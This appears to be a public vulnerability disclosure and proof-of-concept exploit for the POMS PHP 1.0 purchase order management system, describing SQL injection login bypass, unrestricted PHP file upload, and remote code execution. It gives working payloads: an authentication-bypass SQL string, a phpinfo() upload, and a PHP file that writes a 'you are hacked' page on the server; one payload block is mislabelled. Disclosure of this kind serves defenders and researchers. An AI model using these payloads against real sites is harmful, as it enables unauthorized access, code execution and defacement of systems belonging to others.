POMS PHP 1.0 SQL Injection / Shell Upload

`## Titles: POMS-PHP-(by oretnom23 )-v1.0-FU-SQLi-RCE-HAT.TRICK  
1. SQLi Bypass Authentication  
2. File Upload  
3. RCE  
## Latest update from the vendor: 5 hours 32 minutes ago  
## Author: nu11secur1ty  
## Date: 05/07/2024  
## Vendor: https://github.com/oretnom23  
## Software:  
https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/sql-injection,  
https://portswigger.net/web-security/file-upload,  
https://portswigger.net/web-security/authentication  
  
## Description:  
SQLi-Bypass-Authentication:  
The username parameter is not sanitizing well, the attacker can bypass  
authentication and login to the system.  
  
---------------------------------------------------------------------------------------------------------------------------------------  
FU:  
Using this vulnerability, the attacker can upload any PHP file on the  
server.  
The parameter id="cimg" is not sanitizing securely.  
STATUS: CRITICAL- Vulnerability  
  
---------------------------------------------------------------------------------------------------------------------------------------  
RCE:  
The attacker can upload a malicious file with hazardous content. Then he  
can use it to create another file on the server.  
STATUS: CRITICAL- Vulnerability  
  
[+]Exploits:  
- SQLi bypass authentication:  
```mysql  
nu11secur1ty' or 1=1#  
```  
  
- FU:  
```  
<?php  
phpinfo();  
?>  
```  
  
- SQLi - Bypass-Authentication:  
```  
<?php  
// by nu11secur1ty - 2023  
$fh = fopen('test.html', 'a');  
fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');  
fclose($fh);  
//unlink('test.html');  
?>  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/poms-php-by-v1-0-103786653)  
  
## Proof and Exploit:  
[href](  
https://www.nu11secur1ty.com/2024/05/poms-php-by-oretnom23-v10-fu-sqli-rce.html  
)  
  
## Time spent:  
00:35:00  
`